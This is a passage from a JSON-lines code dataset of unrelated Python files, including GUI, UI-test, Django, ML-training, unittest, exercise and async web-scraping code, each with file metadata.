3)\nbutton4=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(4))\nbutton4.grid(row = 2, column = 1)\nbutton5=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(5))\nbutton5.grid(row = 2, column = 2)\nbutton6=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(6))\nbutton6.grid(row = 2, column = 3)\nbutton7=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(7))\nbutton7.grid(row = 3, column = 1)\nbutton8=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(8))\nbutton8.grid(row = 3, column = 2)\nbutton9=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(9))\nbutton9.grid(row = 3, column = 3)\n\nroot.mainloop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\t\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"205159480","text":"latent_dim = 4\noutput_dim = 16\ninput_size = 1024 # time steps\nnum_classes = 97\nnum_pitches = 128\nhidden_units = 256\nbatch_size = 16\nnormalize_factor = 9.\nepochs = 20\nsteps = int(32690 / batch_size)\nvalidation_steps = int(2081 / batch_size)\nearly_stopping = 5\npadding = \"same\"\n","sub_path":"members/amit/cond_vae_z/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"67085950","text":"from python.component.Component import Component\n\nclass ExpenseHeaderComponent(Component):\n selectors={\n \"logout_link\":\"xpath=//a[text()='Logout']\",\n \"help_link\":\"id=zenbox_link\",\n \"logged_user_name\":\"xpath=.//*[@class='email']\",\n \"overview_topnav_trial_time_text\": \"xpath=.//*[@id='expense_trial_time']/span\",\n \"overview_topnav_trial_time_toggle_upgrade\": \"xpath=.//*[@id='expense_trial_time']/a\",\n \"overview_topnav_trial_time_upgrade_button\": \"id=upgradeAccount\",\n }\n \n def click_on_logout_button (self):\n self.logger.info(\"Click on logout link.......\")\n self.click_link(\"logout_link\")\n return\n \n def get_logged_user(self):\n logged_user_name = self.get_text(\"logged_user_name\")\n return logged_user_name\n \n def click_on_help_link(self):\n self.logger.info(\"Click on help link.......\")\n self.click_link(\"help_link\")\n return self\n\n def click_link_upgrade_account_header_toolbar(self):\n self.logger.info(\">>> SELECT & CLICK LINK UPGRADE ACCOUNT HEADER TOOLBAR\")\n self.click_element(\"overview_topnav_trial_time_toggle_upgrade\")\n self.wait_until_element_is_visible(\"overview_topnav_trial_time_upgrade_button\")\n self.click_element(\"overview_topnav_trial_time_upgrade_button\")\n return self\n \n def expense_trial_time_should_be(self, trial_time_text):\n self.logger.info(\">>> VERIFY EXPENSE TIME TRIAL SHOW: \" + trial_time_text)\n self.element_should_contain(\"overview_topnav_trial_time_text\", trial_time_text)\n return self\n\n def get_trial_time(self):\n content = self.get_text(\"overview_topnav_trial_time_text\")\n trial_time = content.split(' ')[0]\n return trial_time\n \nclass ExpenseHomeHeaderComponent(Component):\n selectors={\n \"login_link\":\"xpath=//*[@id='subNav']//a[@href='/users/login']\",\n \"sign_up_link\":\"xpath=//*[@id='subNav']//a[contains(text(),'Sign Up')]\"\n }\n \n def click_on_link_login (self):\n self.logger.info(\"Click on login link.......\")\n self.click_link(\"login_link\")\n return self\n \n def click_on_link_sign_up (self):\n self.logger.info(\"Click on sign up link.......\")\n self.click_link(\"sign_up_link\")\n return self","sub_path":"expense-ui-robot-tests/PythonExpenseAutomationTest/python/component/pagepart/HeaderComponent.py","file_name":"HeaderComponent.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"337075203","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n# @Time : 2019/10/28\n# @Author : hopsonxw\n# @FileName: NCAreaManagement.py\n# @Software: PyCharm\n# @email :190135@lifeat.cn\nfrom DestroyerRobot.automation.util.XmlUtil import XmlUtil\nfrom DestroyerRobot.automation.util.ConfigUtil import Config\nfrom DestroyerRobot.automation.util.DateTimeUtil import TestDateTime\nfrom DestroyerRobot.automation.com.cn.base.BasePage import BasePage\nfrom DestroyerRobot.automation.util.SystemOsUtil import SystemOs\nfrom DestroyerRobot.automation.com.cn.new_cms.servers.NC_Tree.test_nc_tree import test_nctree_master\nfrom DestroyerRobot.automation.com.cn.new_cms.servers.NC_TreeKids.test_nctree_kids import test_nctree_kids\nfrom DestroyerRobot.automation.com.cn.new_cms.servers.NCLoing.NCLogin import NCLoing\nfrom DestroyerRobot.automation.util.RandomUtil import TestRamdom\nfrom DestroyerRobot.automation.util.MySqlDBUtil import MysqlDB\nimport traceback\nimport time\n\nclass NC_AreaManagement:\n def __init__(self,driver):\n \"\"\"\n 实现数据后,定位页面信息操作\n 登录页面,操作数据\n \"\"\"\n self.driver = driver\n\n def rootChildConfigPath(self):\n # 从主配置文件中获取子配置文件路径\n conf2 = Config(\"ConfigKIDs\")\n # 获取子文件路径\n confFile = conf2.get_configPath(\"new_cms_configs\")\n return confFile\n\n def childConfigXML(self, Pageskeyword, UIElementkeyword):\n confFile = self.rootChildConfigPath()\n config2 = Config(\"XMLFilePath\", confFile)\n filepath = config2.get_path_config(\"area_management\")\n filepath = SystemOs().sys_path(filepath)\n xmlspath = XmlUtil(filepath)\n # 获取XML中相关信息\n xmls = xmlspath.xml_parsing(Pageskeyword, UIElementkeyword)\n return xmls\n\n def childConfigImgPath(self):\n \"\"\"\n 获取图片路径,并新建以日期为基础的文件目录名 例如: img/2019-01-01/\n :return:\n \"\"\"\n confFile = self.rootChildConfigPath()\n config3 = Config(\"ImgPath\",confFile)\n img_path = config3.get_path_config(\"error_img\")\n data_path = TestDateTime().local_day()\n img_path = SystemOs().sys_path(img_path,data_path)\n SystemOs().mkdirs_file(img_path)\n return img_path\n\n def add_area(self):\n add_btn_bys,add_btn_values = self.childConfigXML('片区管理','新增')\n input_area_bys,input_area_values = self.childConfigXML('片区管理','输入片区名称')\n input_part_bys, input_part_values = self.childConfigXML('片区管理', '选择归属区域')\n select_part_bys, select_part_values = self.childConfigXML('片区管理', '归属区域下拉选项')\n select_province_bys, select_province_values = self.childConfigXML('片区管理', '关联省份')\n select_city_bys, select_city_values = self.childConfigXML('片区管理', '关联城市')\n select_county_bys, select_county_values = self.childConfigXML('片区管理', '关联区县')\n save_btn_bys,save_btn_values = self.childConfigXML('片区管理','保存')\n nc = NCLoing(self.driver)\n try:\n test_nctree_master(self.driver).get_link_config_center() # 点击配置中心\n test_nctree_master(self.driver).get_link_Basic_data() # 点击基础数据\n test_nctree_kids(self.driver).get_link_Area_management() # 点击片区管理\n nc.input_click(add_btn_bys,add_btn_values) # 点击新增片区\n radom_num = TestRamdom().RandomTestInt(500,0)\n area_name = 'xw_AutoTest_片区'+ str(radom_num)\n\n nc.Input_z(area_name,input_area_bys,input_area_values) # 输入片区名称\n nc.input_click(input_part_bys,input_part_values) # 点击展开归属区域下拉选项\n nc.input_click(select_part_bys,select_part_values) # 选择归属区域\n time.sleep(6)\n nc.input_click_z(select_province_bys, select_province_values) # 选择省份\n time.sleep(2)\n nc.input_click_o(select_city_bys, select_city_values) # 选择城市\n nc.input_click_t(select_county_bys, select_county_values) # 选择区县\n time.sleep(2)\n nc.input_click(save_btn_bys,save_btn_values) # 保存\n time.sleep(2)\n\n return area_name\n\n # # 连接测试数据库,获取最新创建的部门名称(获取的名称没有按顺序排列,放弃此方法)\n # my = MysqlDB()\n # my.getCursor(sqltable=\"easylife_commallot\")\n # sql = \"SELECT department_name FROM commallot_staff_department\"\n # department = my.queryOperation(sql)\n # print(department)\n # return department\n\n except Exception:\n img_path = self.childConfigImgPath()\n BasePage(self.driver).save_img(img_path, str(int(TestDateTime().time_stamp())))\n print(traceback.format_exc())\n","sub_path":"DestroyerRobot/DestroyerRobot/automation/com/cn/new_cms/servers/NC_testcase/NCAreaManagement.py","file_name":"NCAreaManagement.py","file_ext":"py","file_size_in_byte":5003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"216274007","text":"from baserow.core.exceptions import UserNotInGroupError\nfrom baserow.core.utils import extract_allowed, set_allowed_attrs\nfrom baserow.contrib.database.fields.models import Field\n\nfrom .exceptions import ViewDoesNotExist, UnrelatedFieldError\nfrom .registries import view_type_registry\nfrom .models import View, GridViewFieldOptions\n\n\nclass ViewHandler:\n def get_view(self, user, view_id, view_model=None):\n \"\"\"\n Selects a view and checks if the user has access to that view. If everything\n is fine the view is returned.\n\n :param user: The user on whose behalf the view is requested.\n :type user: User\n :param view_id: The identifier of the view that must be returned.\n :type view_id: int\n :param view_model: If provided that models objects are used to select the\n view. This can for example be useful when you want to select a GridView or\n other child of the View model.\n :raises ViewDoesNotExist: When the view with the provided id does not exist.\n :raises UserNotInGroupError: When the user does not belong to the related group.\n :type view_model: View\n :return:\n \"\"\"\n\n if not view_model:\n view_model = View\n\n try:\n view = view_model.objects.select_related('table__database__group').get(\n pk=view_id\n )\n except View.DoesNotExist:\n raise ViewDoesNotExist(f'The view with id {view_id} does not exist.')\n\n group = view.table.database.group\n if not group.has_user(user):\n raise UserNotInGroupError(user, group)\n\n return view\n\n def create_view(self, user, table, type_name, **kwargs):\n \"\"\"\n Creates a new view based on the provided type.\n\n :param user: The user on whose behalf the view is created.\n :type user: User\n :param table: The table that the view instance belongs to.\n :type table: Table\n :param type_name: The type name of the view.\n :type type_name: str\n :param kwargs: The fields that need to be set upon creation.\n :type kwargs: object\n :raises UserNotInGroupError: When the user does not belong to the related group.\n :return: The created view instance.\n :rtype: View\n \"\"\"\n\n group = table.database.group\n if not group.has_user(user):\n raise UserNotInGroupError(user, group)\n\n # Figure out which model to use for the given view type.\n view_type = view_type_registry.get(type_name)\n model_class = view_type.model_class\n allowed_fields = ['name'] + view_type.allowed_fields\n view_values = extract_allowed(kwargs, allowed_fields)\n last_order = model_class.get_last_order(table)\n\n instance = model_class.objects.create(table=table, order=last_order,\n **view_values)\n\n return instance\n\n def update_view(self, user, view, **kwargs):\n \"\"\"\n Updates an existing view instance.\n\n :param user: The user on whose behalf the view is updated.\n :type user: User\n :param view: The view instance that needs to be updated.\n :type view: View\n :param kwargs: The fields that need to be updated.\n :type kwargs: object\n :raises ValueError: When the provided view not an instance of View.\n :raises UserNotInGroupError: When the user does not belong to the related group.\n :return: The updated view instance.\n :rtype: View\n \"\"\"\n\n if not isinstance(view, View):\n raise ValueError('The view is not an instance of View.')\n\n group = view.table.database.group\n if not group.has_user(user):\n raise UserNotInGroupError(user, group)\n\n view_type = view_type_registry.get_by_model(view)\n allowed_fields = ['name'] + view_type.allowed_fields\n view = set_allowed_attrs(kwargs, allowed_fields, view)\n view.save()\n\n return view\n\n def delete_view(self, user, view):\n \"\"\"\n Deletes an existing view instance.\n\n :param user: The user on whose behalf the view is deleted.\n :type user: User\n :param view: The view instance that needs to be deleted.\n :type view: View\n :raises ViewDoesNotExist: When the view with the provided id does not exist.\n :raises UserNotInGroupError: When the user does not belong to the related group.\n \"\"\"\n\n if not isinstance(view, View):\n raise ValueError('The view is not an instance of View')\n\n group = view.table.database.group\n if not group.has_user(user):\n raise UserNotInGroupError(user, group)\n\n view.delete()\n\n def update_grid_view_field_options(self, grid_view, field_options, fields=None):\n \"\"\"\n Updates the field options with the provided values if the field id exists in\n the table related to the grid view.\n\n :param grid_view: The grid view for which the field options need to be updated.\n :type grid_view: Model\n :param field_options: A dict with the field ids as the key and a dict\n containing the values that need to be updated as value.\n :type field_options: dict\n :param fields: Optionally a list of fields can be provided so that they don't\n have to be fetched again.\n :type fields: None or list\n :raises UnrelatedFieldError: When the provided field id is not related to the\n provided view.\n \"\"\"\n\n if not fields:\n fields = Field.objects.filter(table=grid_view.table)\n\n allowed_field_ids = [field.id for field in fields]\n for field_id, options in field_options.items():\n if int(field_id) not in allowed_field_ids:\n raise UnrelatedFieldError(f'The field id {field_id} is not related to '\n f'the grid view.')\n GridViewFieldOptions.objects.update_or_create(\n grid_view=grid_view, field_id=field_id, defaults=options\n )\n","sub_path":"backend/src/baserow/contrib/database/views/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"533888099","text":"from torch import nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch\n\n\ndef test_model(model, test_loader, device):\n correct = 0\n total = 0\n ce_loss = 0\n with torch.no_grad():\n for imgs, labels in test_loader:\n\n imgs = imgs.to(device)\n labels = labels.to(device)\n\n preds = model(imgs)\n _, answers = torch.max(preds.data, 1)\n\n total += labels.size(0)\n correct += (answers == labels).sum().item()\n\n ce_loss += F.cross_entropy(preds, labels).item()\n ce_loss /= len(test_loader)\n accuracy = correct / total\n return ce_loss, accuracy\n\n\ndef train_hard_labels(model, train_loader, val_loader, num_epochs, lr, \n device, log=False):\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters(), lr=lr)\n\n val_acc = []\n for i in range(num_epochs):\n\n if log:\n print(\"Epoch {}\".format(i))\n\n running_loss = 0.0\n total = 0\n correct = 0\n\n for i_batch, (imgs, labels) in enumerate(train_loader):\n\n imgs = imgs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n pred = model(imgs)\n\n _, answers = torch.max(pred.data, 1)\n total += labels.size(0)\n correct += (answers == labels).sum().item()\n\n loss = criterion(pred, labels)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n\n train_acc = correct/total\n ce_loss, acc = test_model(model, val_loader, device)\n\n val_acc.append(acc)\n\n if log:\n print(\"Train: accuracy: {:.3f}, CE: {:.3f}\".format(train_acc, running_loss/len(train_loader)))\n print(\"Validation: accuracy: {:.3f}, CE: {:.3f}\".format(acc, ce_loss))\n\n return val_acc\n\n\ndef distill_loss(distill_pred, soft_labels, labels, T, alpha):\n hard_loss = F.cross_entropy(distill_pred, labels)\n\n distill_probs = F.log_softmax(distill_pred/T, dim=1)\n soft_probs = F.log_softmax(soft_labels/T, dim=1)\n\n soft_loss = F.kl_div(distill_probs, soft_probs, reduction='batchmean')\n\n return alpha * soft_loss * (T**2) + (1 - alpha) * hard_loss\n\n\ndef train_soft_labels(distill_model, teacher_model, train_loader, val_loader, \n num_epochs, lr, T, alpha, device, log=False):\n \"\"\"\n distill_model - модель, которую обучаем\n teacher_model - модель, которая генерирует \"мягкие\" ответы\n T - температура\n alpha - коэфициент перед ошибкой:\n loss = alpha * soft_loss * (T**2) + (1 - alpha) * hard_loss\n \"\"\"\n\n optimizer = optim.Adam(distill_model.parameters(), lr=lr)\n\n val_acc = []\n for i in range(num_epochs):\n\n if log:\n print(\"Epoch {}\".format(i))\n\n total = 0\n correct = 0\n running_loss = 0.0\n for i_batch, (imgs, labels) in enumerate(train_loader):\n imgs = imgs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n distill_pred = distill_model(imgs)\n soft_labels = teacher_model(imgs).detach()\n\n loss = distill_loss(distill_pred, soft_labels, labels, T, alpha)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n _, answers = torch.max(distill_pred.data, 1)\n total += labels.size(0)\n correct += (answers == labels).sum().item()\n\n train_acc = correct/total\n ce_loss, acc = test_model(distill_model, val_loader, device)\n\n val_acc.append(acc)\n\n if log:\n print(\"Train: accuracy: {:.3f}, CE: {:.3f}\".format(train_acc, running_loss/len(train_loader)))\n print(\"Validation: accuracy: {:.3f}, CE: {:.3f}\".format(acc, ce_loss))\n\n return val_acc\n","sub_path":"train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"252213575","text":"try:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\nimport logging\n\nfrom sparts.vservice import VService\n\n\n# Import a Skip exception class that works with both pytest and unittest2\ntry:\n from _pytest.runner import Skipped\n class Skip(Skipped, unittest.SkipTest):\n pass\n\nexcept ImportError:\n class Skip(unittest.SkipTest):\n pass\n\n\n# Base test case for all sparts jonx\nclass BaseSpartsTestCase(unittest.TestCase):\n def assertNotNone(self, o, msg=''):\n self.assertTrue(o is not None, msg)\n\n def assertEmpty(self, arr, msg=''):\n return self.assertEquals(len(arr), 0, msg)\n\n def assertNotEmpty(self, o, msg=''):\n self.assertTrue(len(o) > 0, msg)\n\n @classmethod\n def setUpClass(cls):\n cls.logger = logging.getLogger('sparts.%s' % cls.__name__)\n super(BaseSpartsTestCase, cls).setUpClass()\n\n def setUp(self):\n if not hasattr(unittest.TestCase, 'setUpClass'):\n cls = self.__class__\n if not hasattr(cls, '_unittest2_setup'):\n cls.setUpClass()\n cls._unittest2_setup = 0\n cls._unittest2_setup += 1\n\n def tearDown(self):\n if not hasattr(unittest.TestCase, 'tearDownClass'):\n cls = self.__class__\n if not hasattr(cls, '_unittest2_setup'):\n cls._unittest2_setup = 0\n else:\n cls._unittest2_setup -= 1\n if cls._unittest2_setup == 0:\n cls.tearDownClass()\n\n def assertContains(self, item, arr, msg=''):\n return self.assertIn(item, arr, msg)\n\n @property\n def mock(self, *args, **kwargs):\n try:\n import mock\n return mock\n except ImportError:\n raise Skip(\"the mock module is required to run this test\")\n\n\nclass ServiceTestCase(BaseSpartsTestCase):\n def getServiceClass(self):\n return VService\n\n def setUp(self):\n super(ServiceTestCase, self).setUp()\n\n TestService = self.getServiceClass()\n TestService.test = self\n\n ap = TestService._makeArgumentParser()\n ns = ap.parse_args(['--level', 'DEBUG'])\n self.service = TestService(ns)\n self.runloop = self.service.startBG()\n\n def tearDown(self):\n self.service.stop()\n self.runloop.join()\n super(ServiceTestCase, self).tearDown()\n\n\nclass MultiTaskTestCase(ServiceTestCase):\n TASKS = []\n\n def requireTask(self, task_name):\n self.assertNotNone(self.service)\n return self.service.requireTask(task_name)\n\n def getServiceClass(self):\n self.assertNotEmpty(self.TASKS)\n class TestService(VService):\n TASKS=self.TASKS\n return TestService\n\n def setUp(self):\n super(MultiTaskTestCase, self).setUp()\n for t in self.TASKS:\n self.service.requireTask(t.__name__)\n\n\nclass SingleTaskTestCase(MultiTaskTestCase):\n TASK = None\n\n @classmethod\n def setUpClass(cls):\n super(SingleTaskTestCase, cls).setUpClass()\n if cls.TASK:\n cls.TASKS = [cls.TASK]\n\n def setUp(self):\n self.assertNotNone(self.TASK)\n super(SingleTaskTestCase, self).setUp()\n self.task = self.service.requireTask(self.TASK.__name__)\n","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"103268155","text":"''' Crie um programa que leia uma frase qualquer e diga se ela é um palíndromo, desconsiderando os espaços. \r\nEx: (palavras que podem ser lidas de trás para frente ou visse e versa)\r\napos a sopa\r\na sacada da casa\r\na torre da derrota\r\no lobo ama o bolo \r\nanotaram a data da maratona'''\r\nfrase = str(input('Digite uma frase : ')).strip().upper()\r\ndividir = frase.split()\r\njunto = ''.join(dividir)\r\ninverso = junto[::-1]\r\n'''inverso = ''\r\nfor letra in range(len(junto)-1 ,-1, -1):\r\n inverso += junto[letra]'''\r\nprint('O inverso de {} é {}'.format(junto, inverso))\r\nif inverso == junto:\r\n print('Temos um palíndromo!')\r\nelse:\r\n print('A frase digitada não é palíndromo')\r\n","sub_path":"desafio053.py","file_name":"desafio053.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"613330091","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0002_auto_20170515_0929'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Charity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100)),\n ('description', models.TextField(null=True, blank=True)),\n ('goal', models.DecimalField(default=0, max_digits=10, decimal_places=2)),\n ('pic', models.ImageField(null=True, upload_to='charity_image/%Y/%m/%d', blank=True)),\n ('is_active', models.BooleanField(default=True)),\n ],\n options={\n 'verbose_name': 'Charity',\n 'verbose_name_plural': 'Charities',\n },\n ),\n migrations.CreateModel(\n name='CharityDonation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('amount', models.DecimalField(default=0, max_digits=10, decimal_places=2)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('is_active', models.BooleanField(default=True)),\n ('charity', models.ForeignKey(to='app.Charity')),\n ],\n options={\n 'verbose_name': 'Charity Donation',\n 'verbose_name_plural': 'Charity Donations',\n },\n ),\n ]\n","sub_path":"app/migrations/0003_charity_charitydonation.py","file_name":"0003_charity_charitydonation.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"510350820","text":"import tensorflow as tf\nimport tensorflow.contrib.layers as layers\nimport sys\nimport numpy as np\n\n\ndef build_q_func(network, num_experts, hiddens=[256], dueling=True, layer_norm=False, **network_kwargs):\n assert isinstance(network, str)\n if isinstance(network, str):\n from baselines.common.models import get_network_builder\n # with tf.variable_scope(\"inp\"):\n inp_network = get_network_builder(network)(**network_kwargs)\n # with tf.variable_scope(\"bel\"):\n bel_network = get_network_builder(network)(**network_kwargs)\n\n def q_func_builder(input_placeholder, belief_placeholder, expert_q_ph, num_actions, scope, reuse=False):\n # input_placeholder = tf.Print(input_placeholder, [input_placeholder], '>>>> INP :', summarize=64*48)\n\n with tf.variable_scope(scope, reuse=reuse):\n # input_placeholder = tf.Print(input_placeholder, [input_placeholder], '>>>> INPUT: ', summarize=100)\n latent_inp = inp_network(input_placeholder)\n if isinstance(latent_inp, tuple):\n if latent_inp[1] is not None:\n raise NotImplementedError(\"DQN is not compatible with recurrent policies yet\")\n latent_inp = latent_inp[0]\n\n latent_inp = layers.flatten(latent_inp)\n\n # belief_placeholder = tf.Print(belief_placeholder, [belief_placeholder], '>>>> BEL :', summarize=64*48)\n\n with tf.variable_scope(scope, reuse=reuse):\n\n with tf.variable_scope(\"bel\", reuse=reuse):\n # residual network takes both input and bel\n latent_bel = bel_network(belief_placeholder)\n if isinstance(latent_bel, tuple):\n if latent_bel[1] is not None:\n raise NotImplementedError(\"DQN is not compatible with recurrent policies yet\")\n latent_bel = latent_bel[0]\n\n latent_bel = layers.flatten(latent_bel)\n stacked = tf.stack([latent_inp, latent_bel], axis=1)\n latent = layers.flatten(stacked)\n\n with tf.variable_scope(\"action_value\"):\n action_out = latent\n for hidden in hiddens:\n action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)\n if layer_norm:\n action_out = layers.layer_norm(action_out, center=True, scale=True)\n action_out = tf.nn.relu(action_out)\n action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)\n\n if dueling:\n with tf.variable_scope(\"state_value\"):\n state_out = latent\n for hidden in hiddens:\n state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)\n if layer_norm:\n state_out = layers.layer_norm(state_out, center=True, scale=True)\n state_out = tf.nn.relu(state_out)\n state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)\n action_scores_mean = tf.reduce_mean(action_scores, 1)\n action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)\n q_out = state_score + action_scores_centered\n else:\n q_out = action_scores\n #q_out = tf.Print(q_out, [q_out], '>>>> FOUT :', summarize=3)\n #expert_q_ph = tf.Print(expert_q_ph, [expert_q_ph], '>>>> EXP :', summarize=3)\n\n q_out = q_out + expert_q_ph\n\n\n return q_out\n\n return q_func_builder\n\n","sub_path":"brl_baselines/rbqnfe_staged/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"3185679","text":"\"\"\"\nТестовое задание REG.RU\n=======================\n\nСкрипт берет список доменов, для каждого домена скачивает главную страницу сайта,\nочищает html форматирование, добавляет в первые три строчки\ntitle, meta:description, meta:keywords, записывает получившиеся данные\nв выходную директорию и сохраняет результат в выходном csv файле\n\nВсе файлы сохраняются в кодировке utf-8.\nСайты с битыми кодировками не обрабатываются.\n\n\"\"\"\nimport re\n\nimport aiohttp\nimport asyncio\n\nimport os\nimport ssl\n# from html.parser import HTMLParser\nfrom bs4 import BeautifulSoup\n\n# ===========================================\n# Конфигурация\n\n# Имя файла со списком доменов\nDOMAIN_LIST = 'domains-list.csv'\n\n# Имя выходного файла с таблицей результатов\nOUTPUT_FILENAME = 'result.csv'\n\n# Директория со скачанными и обработанными файлами\nDOWNLOAD_DIR = './downloads/'\n\n# Максимальное число одновременных соединений\nMAX_CONNECTIONS = 100\n\n\n# ===========================================\n# html parser\n\ndef get(d, key, default=None): return d.get(key, default) if d else default\n\ndef parse(doc):\n \"\"\"Парсит скачанный html\n Парсит скачанный html, возвращает clear text, где первые три строчки это\n title, meta:keywords, meta:description\n \"\"\"\n\n bs = BeautifulSoup(doc, \"lxml\")\n title = getattr(bs.find('title'), 'string', '')\n keywords = get(bs.find('meta', attrs={'name':'keywords'}), 'content', '')\n description = get(bs.find('meta', attrs={'name':'description'}), 'content', '')\n\n for s in bs('script'): s.extract()\n for s in bs('style'): s.extract()\n text = re.sub(r'\\n+', '\\n', getattr(bs.body, 'text', '').strip())\n\n return \"{}\\n{}\\n{}\\n{}\".format(title, keywords, description, text)\n\n\n# ===========================================\n# Подготовительные операции\n\n# Читаем входной csv файл\n# Можно использовать pandas или csv, но так как формат известен проще всего распарсить вручную\n# df = pandas.read_csv(DOMAIN_LIST, usecols=[1])\n\nwith open(DOMAIN_LIST) as f:\n domains = [s.rstrip().split(',')[1] for s in f][1:]\n\n# domains = domains[200:500]\n# domains = ['1nt-c.ru']\n\ntotal = len(domains)\nprocessed = 0\n\nprint('==================================')\nprint('REG.RU Scrap domains test task\\n{} domains to process'.format(len(domains)))\nprint('==================================\\n\\n')\n\n# Готовим файл с результатами, будем добавлять в него записи по мере обработки\nwith open(OUTPUT_FILENAME, 'w') as f:\n f.write('dname,status,flag\\n')\n\n# ===========================================\n# Рабочие корутины\n\n# Семафор для ограничения количества одновременных соединений\nsem = asyncio.Semaphore(MAX_CONNECTIONS)\n\n\nasync def fetch(session, domain):\n url = 'http://{}/'.format(domain)\n\n def log(s):\n print('{}: {}'.format(url, s))\n\n status = None\n flag = 0\n\n async with sem:\n try:\n async with session.get(url) as response:\n status = response.status\n log('Connected, STATUS: {}'.format(status))\n\n if status == 200:\n raw = await response.read()\n\n data = parse(raw.decode(response.charset or 'utf-8', 'ignore') if raw else '')\n\n fn = os.path.join(DOWNLOAD_DIR, '{}.txt'.format(domain))\n try:\n with open(fn, 'wt', encoding='utf-8') as f:\n f.write(data)\n flag = 1\n except IOError:\n print(\"{}: Can't write file {}\".format(url, fn))\n\n except aiohttp.ClientError as e:\n log('Not connected, ERROR: {}'.format(e))\n\n except UnicodeError as e:\n log(\"UnicodeError, ERROR: {}\".format(e))\n\n with open(OUTPUT_FILENAME, 'ab') as f:\n f.write('{},{},{}\\n'.format(\n domain,\n 'NULL' if status is None else status,\n flag\n ).encode('utf-8'))\n\n global processed\n processed += 1\n\n if processed == total or processed % 50 == 1:\n print('============================= Progress: {} of {} domains processed'.format(processed, total))\n\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n await asyncio.wait([fetch(session, d) for d in domains])\n\n\n# ===========================================\n# Event loop\n\nloop = asyncio.get_event_loop()\n\n\ndef exception_handler(loop, context):\n if isinstance(context['exception'], ssl.CertificateError):\n # игнорируем CertificateError, иначе оно вываливается в логах\n pass # ignore todo: log it?\n else:\n loop.default_exception_handler(context)\n\n\nloop.set_exception_handler(exception_handler)\n\nloop.run_until_complete(main())\n\nloop.close()\n\nprint('Finished')\n","sub_path":"regru.py","file_name":"regru.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"288626625","text":"# this file is based on code publicly available at\n# https://github.com/locuslab/smoothing\n# written by Jeremy Cohen.\n\nimport argparse\nimport time\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.optim import Optimizer\nfrom torch.utils.data import DataLoader\n\nfrom architectures import ARCHITECTURES\nfrom datasets import DATASETS\nfrom train_utils import AverageMeter, accuracy, log, test\nfrom train_utils import prologue\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('dataset', type=str, choices=DATASETS)\nparser.add_argument('arch', type=str, choices=ARCHITECTURES)\nparser.add_argument('--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--epochs', default=90, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--batch', default=256, type=int, metavar='N',\n help='batchsize (default: 256)')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n help='initial learning rate', dest='lr')\nparser.add_argument('--lr_step_size', type=int, default=30,\n help='How often to decrease learning by gamma.')\nparser.add_argument('--gamma', type=float, default=0.1,\n help='LR is multiplied by gamma on 